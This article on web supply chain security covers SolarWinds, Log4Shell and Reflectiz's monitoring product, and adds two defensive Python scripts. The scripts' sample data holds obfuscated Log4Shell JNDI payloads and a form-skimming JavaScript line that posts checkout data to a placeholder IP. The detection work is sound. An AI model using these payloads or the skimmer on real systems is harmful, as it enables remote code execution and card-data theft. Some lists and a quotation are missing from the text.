Do You Really Trust Your Web Application Supply Chain?


It’s the modular nature of modern web applications that has made them so effective. They can call on dozens of third-party web components, JS frameworks, and open-source tools to deliver all the different functionalities that keep their customers happy, but this chain of dependencies is also what makes them so vulnerable.
Many of the components in that supply chain are controlled by a third party, the vendor that created them, and many are fetched at runtime from the vendor's servers and executed in your visitors' browsers with the same privileges as your own code. This means that no matter how rigorous your own static code analysis, code reviews, penetration testing, and other SSDLC processes are, much of your supply chain's security is in the hands of whoever built and hosts those third-party components.
Because they contain so many potential weak spots, and because they are used so widely in the lucrative ecommerce, financial, and medical sectors, web application supply chains present a juicy target for attackers. Compromising any one of the dozens of components an organization trusts is a way into that organization and its products. Software, third-party libraries, and even IoT devices are routinely attacked because they offer a route to privileged access that is hard to detect. From there, attackers can launch Magecart and web-skimming attacks, deploy ransomware, conduct commercial and political espionage, mine cryptocurrency on the victim's systems, or simply vandalize them.
In December 2020, a supply chain attack was discovered that dwarfs most others in scale and sophistication. It targeted Orion, a network and application monitoring platform made by SolarWinds. The attackers had covertly compromised the company's build environment and used that access to insert a backdoor into legitimately signed Orion updates, which were distributed to as many as 18,000 customers.
When those customers installed the compromised updates, the attackers gained a foothold in their networks and had free rein within them for months before the intrusion was detected. U.S. government agencies were among the victims, prompting investigations that attributed the operation to the Russian state.
The same pattern applies to web environments: a third-party script that your pages load from a vendor's servers is updated by that vendor, not by you, and a malicious change reaches your visitors' browsers without ever passing through your own review. That is why a comprehensive and proactive web security solution has to continuously monitor your web assets.
Standard security processes did not catch the SolarWinds compromise, and they cannot monitor your entire supply chain. There are many potential risk areas that they simply miss, such as:

In these and many other situations, standard security tools will fall short.
Another such situation arose when a zero-day vulnerability was discovered in Log4j, the widely used Java logging library. Millions of computers owned by businesses, organizations, and individuals around the world run online services that use Log4j. Apache shipped a fixed release within days of the vulnerability's public disclosure in December 2021, but in the words of Sophos senior threat researcher Sean Gallagher:

The vulnerability, CVE-2021-44228, widely known as Log4Shell, gives an attacker remote code execution on a susceptible Java application: vulnerable Log4j versions evaluated lookup expressions embedded in logged text, so a string such as ${jndi:ldap://attacker.example/x} placed in any field the application logs (a User-Agent header, a username, a search query) made the server fetch and load a Java object from the attacker's server. Again, compromised hosts can then be used for cryptocurrency mining, building botnets, sending spam, establishing backdoors, injecting Magecart skimmers, and launching ransomware attacks.
After disclosure, Check Point reported millions of exploitation attempts, with some researchers observing more than 100 attempts per minute and attempts against over 40% of business networks around the world.
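The reports above count exploitation attempts, and the most basic place to look for them yourself is your own web access logs. The following Python script is an added example written for this page (not code from the original article or from Reflectiz): it normalizes the obfuscations attackers stacked on Log4Shell payloads (URL encoding, ${lower:x}/${upper:x} lookups, and the ${...:-x} default-value trick) before matching, because a plain search for the literal string "${jndi:" misses most real probes. It assumes Combined Log Format; the log lines are constructed for the example and use documentation IP ranges.

```python
"""Detect Log4Shell (CVE-2021-44228) probes in web access logs, including the
obfuscated lookups attackers used to get past naive searches for "${jndi:"."""
import re
import urllib.parse

# Constructed sample lines in Combined Log Format (not from the article). The
# User-Agent and query string are typical injection points because many Java
# applications log both through Log4j. IPs are from documentation ranges.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:13:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:13:01:09 +0000] '
    '"GET /?x=${${lower:j}ndi:${lower:r}mi://198.51.100.9/b} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:13:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.9/c}"',
    '203.0.113.10 - - [10/Dec/2021:13:01:15 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%2Fd%7D HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:13:01:18 +0000] "GET /docs/${project.version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d+ \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Rewrites that undo Log4j lookup tricks one layer at a time. The character
# class excludes nested "${" and "}", so the innermost lookup is resolved first.
LOOKUP_FIXUPS = [
    # ${lower:j} / ${upper:J} -> j
    (re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I), r"\1"),
    # default-value syntax ${<anything>:-x}, e.g. ${::-j} or ${env:NOPE:-j} -> x
    (re.compile(r"\$\{[^${}]*:-([^${}]*)\}"), r"\1"),
]

JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z0-9+.-]+):(?://)?(?P<target>[^}]*)\}")


def normalize(text, max_rounds=8):
    """Strip URL encoding and Log4j lookup obfuscation until a fixed point
    (bounded, so a pathological payload cannot keep the scanner spinning)."""
    for _ in range(max_rounds):
        before = text
        text = urllib.parse.unquote(text)
        for pattern, repl in LOOKUP_FIXUPS:
            text = pattern.sub(repl, text)
        if text == before:
            break
    return text.lower()


def find_jndi_lookups(text):
    """Return (scheme, target) for every JNDI lookup left after normalization."""
    return [(m.group("scheme"), m.group("target")) for m in JNDI_RE.finditer(normalize(text))]


def scan_access_log(lines):
    """Return one (client_ip, scheme, target) tuple per JNDI lookup in any logged field."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Combined Log Format; production code should count these
        for field in ("req", "ref", "ua"):
            for scheme, target in find_jndi_lookups(m.group(field)):
                hits.append((m.group("ip"), scheme, target))
    return hits


if __name__ == "__main__":
    for ip, scheme, target in scan_access_log(SAMPLE_LOGS):
        print(f"Log4Shell probe from {ip}: {scheme} lookup to {target}")
```

Run against the samples, the scanner flags four of the six lines: the plain payload, the ${lower:} variant, the ${::-} variant, and the URL-encoded one, while the harmless ${project.version} path is ignored. The target it extracts is the callback host, which is what you block at the egress firewall and pivot on in the rest of your logs.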
Given that your web application supply chain could already have been compromised via the Log4j vulnerability, the need for a proactive, continuous monitoring solution becomes even more urgent.
One such solution comes from the web security company Reflectiz. Its platform detected the Log4j vulnerability in Microsoft's Bing domain at an early stage, and Microsoft promptly patched it. Reflectiz then proactively scanned thousands of websites and services for other instances of the Log4j vulnerability. One significant instance was found in Microsoft's UET component, affecting millions of users across various platforms. Reflectiz notified and worked with clients and prospects to mitigate the risk, following responsible disclosure by informing Microsoft and sharing its findings. The company stresses that the Log4j event is ongoing and urges organizations to secure their websites by addressing third-party vulnerabilities.
The interplay of in-house and third-party components in your web application supply chain makes for a dynamic environment that is constantly in flux. A continuously changing environment calls for a continuous monitoring solution that alerts you to suspicious behavior in every element of your web application supply chain. Through rigorous continuous monitoring, security teams can:

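As an added example of what continuous monitoring of the client-side supply chain can check, covering both the Magecart and web-skimming risk raised earlier and the monitoring argument above (example code written for this page, not Reflectiz's product or code from the original article), the following Python script audits the script tags of a page against an allowlist of hosts, the Subresource Integrity (SRI) attribute where one is present, and the script hashes recorded by the previous scan. The page, script bodies, host allowlist, and baseline are all constructed inline; hostnames use the reserved .test TLD and the skimmer's exfiltration address is a documentation IP.

```python
"""Audit a page's third-party scripts: host allowlist, Subresource Integrity
(SRI) check, and hash drift against the previous scan's inventory."""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit

SRI_ALGOS = ("sha256", "sha384", "sha512")


class ScriptTagCollector(HTMLParser):
    """Collect (src, integrity) for every <script src=...> tag."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            if a.get("src"):
                self.scripts.append((a["src"], a.get("integrity")))


def sri_hash(body, algo="sha384"):
    """Integrity value in SRI form: '<algo>-<base64 digest>'."""
    return algo + "-" + base64.b64encode(hashlib.new(algo, body).digest()).decode()


def sri_matches(integrity, body):
    """True if any hash token in the integrity attribute matches the body."""
    for token in integrity.split():
        algo = token.split("-", 1)[0]
        if algo in SRI_ALGOS and token == sri_hash(body, algo):
            return True
    return False


def audit_scripts(html, fetched, allowed_hosts, baseline):
    """Return sorted (finding, src) pairs.
    fetched:  src -> script bytes as retrieved by the scanner
    baseline: src -> sha256 hex recorded by the previous scan"""
    collector = ScriptTagCollector()
    collector.feed(html)
    findings, seen = [], set()
    for src, integrity in collector.scripts:
        seen.add(src)
        host = urlsplit(src).hostname
        if host and host not in allowed_hosts:
            findings.append(("unexpected-host", src))
        body = fetched.get(src)
        if body is None:
            findings.append(("unfetched", src))
            continue
        if integrity is None:
            findings.append(("no-sri", src))  # vendor can swap the file silently
        elif not sri_matches(integrity, body):
            findings.append(("sri-mismatch", src))  # browsers would refuse to run it
        digest = hashlib.sha256(body).hexdigest()
        if src not in baseline:
            findings.append(("new-script", src))
        elif baseline[src] != digest:
            findings.append(("hash-drift", src))  # content changed since last scan
    findings.extend(("removed-script", src) for src in baseline if src not in seen)
    return sorted(findings)


# Constructed sample data (hostnames use the reserved .test TLD).
ANALYTICS_JS = b"window.track=function(e){/* analytics */};"
CHECKOUT_JS = b"function pay(f){return fetch('/api/pay',{method:'POST',body:new FormData(f)})}"
# A skimmer appended to the legitimate checkout script: posts form fields elsewhere.
SKIMMER_JS = (b"document.forms[0].addEventListener('submit',e=>fetch('https://203.0.113.66/c',"
              b"{method:'POST',body:new FormData(e.target)}));")
UI_JS = b"window.ui={};"

ANALYTICS = "https://cdn.example-analytics.test/track.js"
CHECKOUT = "https://shop.example.test/js/checkout.js"
UI = "https://static.example-cdn.test/ui.js"
LEGACY = "https://shop.example.test/js/legacy.js"

PAGE_HTML = (
    "<html><head>"
    f'<script src="{ANALYTICS}" integrity="{sri_hash(ANALYTICS_JS)}"></script>'
    f'<script src="{CHECKOUT}"></script>'
    f'<script src="{UI}"></script>'
    "</head><body></body></html>"
)
ALLOWED_HOSTS = {"cdn.example-analytics.test", "shop.example.test"}
FETCHED = {ANALYTICS: ANALYTICS_JS, CHECKOUT: CHECKOUT_JS + SKIMMER_JS, UI: UI_JS}
BASELINE = {
    ANALYTICS: hashlib.sha256(ANALYTICS_JS).hexdigest(),
    CHECKOUT: hashlib.sha256(CHECKOUT_JS).hexdigest(),
    LEGACY: "0" * 64,  # placeholder digest for a script the previous scan saw
}


def audit_sample():
    """Run the audit over the constructed page, fetched bodies, and baseline."""
    return audit_scripts(PAGE_HTML, FETCHED, ALLOWED_HOSTS, BASELINE)


if __name__ == "__main__":
    for finding, src in audit_sample():
        print(f"{finding:16} {src}")
```

In the constructed scenario the analytics script passes every check, the checkout script is flagged for hash drift (the appended skimmer) and for carrying no SRI attribute, the UI script is flagged as new, unlisted, and lacking SRI, and the legacy script is reported as removed. The design point is that a scanner can only raise "hash-drift" if it keeps its own baseline; SRI alone does nothing for first-party scripts served without an integrity attribute, which is exactly where Magecart injections tend to land.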